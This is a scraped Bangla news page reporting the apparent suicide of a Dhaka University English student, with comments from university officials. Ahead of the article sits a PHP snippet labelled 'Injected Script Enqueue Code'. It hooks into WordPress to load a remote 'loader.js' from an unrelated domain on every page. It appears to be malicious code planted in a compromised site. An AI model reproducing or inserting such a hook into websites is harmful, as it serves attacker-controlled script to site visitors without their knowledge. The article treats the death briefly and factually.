// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site আত্মহত্যা করলেন ঢাবি ছাত্রী রুম্পা - Janabarta.com

আত্মহত্যা করলেন ঢাবি ছাত্রী রুম্পা

ঢাবি প্রতিবেদকঃ ঢাকা বিশ্ববিদ্যালয়ের এক ছাত্রী গলায় ফাঁস দিয়ে আত্মহত্যা করেছেন। ইংরেজি বিভাগের চতুর্থ বর্ষে পড়ুয়া ওই শিক্ষার্থীর নাম ফারিহা তাবাসসুম রূম্পা। সোমবার নিজ বাসায় এই ঘটনা ঘটে বলে প্রাথমিকভাবে জানা গেছে।

নিহতের সহপাঠীদের ধারণা, পরিবারের চাপে ওই ছাত্রী আত্মহত্যার পথ বেছে নিয়েছেন। তবে মৃত্যুর প্রকৃত কারণ কী, সে বিষয়ে বিস্তারিত কোনো তথ্য পাওয়া যায়নি।

জানতে চাইলে ঢাকা বিশ্ববিদ্যালয়ের (ঢাবি) প্রক্টর অধ্যাপক ড. এ কে এম গোলাম রব্বানী দ্যা ডেইলি কাম্পাসকে বলেন, খবরটি শুনেছি। আমরা বিভাগ ও তার পরিবারের সদস্যদের সঙ্গে যোগাযোগের চেষ্টা করছি। এ ধরনের কোন অনাকাঙ্ক্ষিত ঘটনা কাম্য নয়। এ সময় সকল আইনি প্রক্রিয়ার মাধ্যমে বিষয়টির সুষ্ঠু তদন্ত করার আশ্বাস দেন তিনি।

ইংরেজি বিভাগের চেয়ারপার্সন অধ্যাপক ড. নেভিন ফরিদা বলেন, আত্মহত্যার বিষয়টি শুনেছি। প্রকৃত কারণ জানার চেষ্টা করছি।